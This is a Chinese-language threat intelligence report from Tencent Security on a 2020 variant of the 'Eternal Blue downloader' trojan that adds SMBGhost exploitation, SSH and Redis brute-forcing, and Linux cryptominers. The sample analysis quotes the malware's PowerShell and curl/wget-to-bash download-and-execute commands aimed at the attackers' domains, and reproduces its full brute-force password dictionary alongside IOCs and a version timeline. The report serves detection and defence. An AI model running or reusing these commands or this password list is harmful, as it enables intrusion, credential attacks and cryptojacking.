“黑球”行动再升级,SMBGhost漏洞攻击进入实战

2020-06-12 10:39:58
2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。

一、背景

2020610日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。

由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。使得木马针对Windows系统的攻击威力再次增强。

腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。

此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。

腾讯安全系列产品应对永恒之蓝下载器木马的响应清单:

应用

场景

安全产品

解决方案

腾讯T-Sec

威胁情报云查服务

SaaS

1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。

各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。

可参考:https://cloud.tencent.com/product/tics

腾讯T-Sec

高级威胁追溯系统

1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。

网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts

云原生安全

防护

腾讯T-Sec 安全运营中心

(云SOC

基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。

关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html

腾讯T-Sec 网络资产风险监测系统

(腾讯御知)

1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796影响。

2)已集成无损检测POC,企业可以对自身资产进行远程检测。

关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html

云防火墙

Cloud FirewallCFW

基于网络流量进行威胁检测与主动拦截,已支持:

1)利用永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测;

2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796洞相关访问流量。

有关云防火墙的更多信息,可参考:
https://cloud.tencent.com/product/cfw

腾讯T-Sec  主机安全

Cloud Workload ProtectionCWP

1)云镜已支持永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796的检测;

2)已支持查杀利用永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796Redis未授权访问漏洞入侵的挖矿木马、后门程序。

腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp

非云企业安全防护

腾讯T-Sec

高级威胁检测系统

(腾讯御界)

基于网络流量进行威胁检测,已支持:

1)利用永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测;

2)对利用永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796协议特征进行识别检测;

关于T-Sec高级威胁检测系统的更多信息,可参考:

https://cloud.tencent.com/product/nta

腾讯T-Sec终端安全管理系统(御点)

1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序;

2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。

3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464Office漏洞CVE-2017-8570攻击的病毒程序;

腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html

更多产品信息,请参考腾讯安全官方网站https://s.tencent.com/

二、样本分析

攻击模块if.binsmbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:

powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'')

发起针对Linux服务器的攻击:

1、 利用SSH爆破

扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破使用密码字典:

"saadmin","123456","test1","zinch","g_czechout","asdf","Aa123456.","dubsmash","password","PASSWORD","123.com","admin@123","Aa123456","qwer12345","Huawei@123","123@abc","golden","123!@#qwe","1qaz@WSX","Ab123","1qaz!QAZ","Admin123","Administrator","Abc123","Admin@123","999999","Passw0rd","123qwe!@#","football","welcome","1","12","21","123","321","1234","12345","123123","123321","111111","654321","666666","121212","000000","222222","888888","1111","555555","1234567","12345678","123456789","987654321","admin","abc123","abcd1234","abcd@1234","abc@123","p@ssword","P@ssword","p@ssw0rd","P@ssw0rd","P@SSWORD","P@SSW0RD","P@w0rd","P@word","iloveyou","monkey","login","passw0rd","master","hello","qazwsx","password1","Password1","qwerty","baseball","qwertyuiop","superman","1qaz2wsx","fuckyou","123qwe","zxcvbn","pass","aaaaaa","love","administrator","qwe1234A","qwe1234a"," ","123123123","1234567890","88888888","111111111","112233","a123456","123456a","5201314","1q2w3e4r","qwe123","a123456789","123456789a","dragon","sunshine","princess","!@#$%^&*","charlie","aa123456","homelesspa","1q2w3e4r5t","sa","sasa","sa123","sql2005","sa2008","abc","abcdefg","sapassword","Aa12345678","ABCabc123","sqlpassword","sql2008","11223344","admin888","qwe1234","A123456","OPERADOR","Password123","test123","NULL","user","test","Password01","stagiaire","demo","scan","P@ssw0rd123","xerox","compta"

爆破登陆成功后执行远程命令:

Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash


2、 利用Redis未授权访问漏洞

扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令:export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash


SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能:

1、 创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp

2、 创建crontab定时启动Linux平台挖矿木马/.Xll/xr


通过定时任务执行的a.asp首先会清除竞品挖矿木马:


然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击:


创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。


永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播:

漏洞利用

弱口令爆破

感染可移动设备

鱼叉攻击

“永恒之蓝”漏洞利用MS17-010

$IPC爆破

通过U盘、网络共享盘

以新冠肺炎等多种主题

Lnk漏洞利用CVE-2017-8464

SMB爆破

创建带漏洞lnk文件、js文件

DOC漏洞文档、js文件诱饵

Office漏洞利用CVE-2017-8570

MS SQL爆破

SMBGhost漏洞利用CVE-2020-0796

RDP爆破

Redis未授权访问漏洞(针对Linux)

SSH爆破(针对Linux)


截止2020612日,永恒之蓝木马下载器家族主要版本更新功能列表如下:

20181214

利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。

20181219

下载之后的木马新增Powershell后门安装。

201919

检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。

2019124

木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。

2019125

木马在124日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。

2019210

将攻击模块打包方式改为Pyinstaller

2019220

更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。

2019223

攻击方法再次更新,新增MsSQL爆破攻击。

2019225

223日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktazpsexec进行辅助攻击。

201936

通过已感染机器后门更新Powershell脚本横向传播模块ipc

201938

通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与20189月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。

2019314

通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。

2019328

更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。

201943

开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。

2019719

无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。

2019109

新增Bluekeep漏洞CVE-2019-0708检测上报功能。

2020212

使用DGA域名,篡改hosts文件。

202043

新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570

2020417

钓鱼邮件新增附件readme.zipreadme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘

2020521

新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。

2020610

新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。

IOCs

Domain

t.amynx.com

t.zer9g.com

t.zz3r0.com

d.ackng.com

URL

http[:]//t.amynx.com/smgh.jsp

http[:]//t.amynx.com/a.jsp

http[:]//t.amynx.com/ln/a.asp

http[:]//t.amynx.com/ln/core.png

http[:]//d.ackng.com/if.bin

http[:]//d.ackng.com/smgh.bin

http[:]//d.ackng.com/ln/xr.zip

Md5

if.bin

99ecca08236f6cf766d7d8e2cc34eff6

xr.zip

2977084f9ce3e9e2d356adaf2b5bdcfd

core.png

17703523f5137bc0755a7e4f133fc9d3

a.asp

8b0cb7a0760e022564465e50ce3271bb

smgh.bin

5b3c44b503c7e592e416f68d3924620f

参考链接:

永恒之蓝木马下载器发起“黑球”行动,新增SMBGhost漏洞检测能力

https://mp.weixin.qq.com/s/QEE95HTKzuT4-NykfvHfGQ

最新资讯